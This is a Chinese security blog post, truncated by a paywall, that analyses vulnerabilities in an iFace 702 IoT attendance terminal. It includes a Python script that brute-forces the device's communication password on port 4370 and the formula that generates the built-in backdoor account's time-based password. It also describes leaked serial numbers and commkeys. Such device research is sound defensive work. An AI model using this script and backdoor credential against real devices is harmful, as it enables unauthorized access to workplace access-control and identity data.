物联网设备iface702考勤机风险隐患分析记录
Kx
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
本次实验室是为了分析物联网设备iface 702考勤机是否存在网络安全风险。经过实验记录来看,该设备接口比较脆弱。
telent连接
端口分析
Telnet进入后查看端口开放情况
发现8000端口
数据库分析
8000端口疑似时钟服务器内置地址
获得设备信息
使用该IP,本地监听泄漏SN、commkey信息
通讯密码爆破
from zk import ZK, const
ip = '10.97.218.209'
conn = None
for i in range(0,10001):
# print(i)
try:
zk = ZK(ip, port=4370, timeout=5, password=i, force_udp=False, ommit_ping=True)
conn = zk.connect()
print("Password Found --> ",i)
break
except Exception as e:
print(i,e)
finally:
if conn:
conn.disconnect()
管理软件连接
爆破获得通讯密码12(12是我修改过的密码,默认为0)
输入ip地址、端口:4370、通讯密码:12、机器号:1

易被当作后门利用的账户
内置用户,用户名8888,密码(9999-当前时间)²
如:当前时间20点33就是 (9999-2033)² =63457156
注:1分钟内输入否则密码会变
获取当前账户密码
除了内置账户,我们可以通过接口测试,获得当前账户密码,通过ID和密码可以登陆账户
可试读前30%内容
¥ 19.9 全文查看
9.9元开通FVIP会员
畅读付费文章
畅读付费文章
最低0.3元/天
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Kx 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
二进制分析-在buu的PWN练习记录(第二期)
2025-03-17
二进制分析-在buu的PWN练习记录(第一期)
2025-02-14
docker的使用和遇到的问题解决记录
2024-12-25
文章目录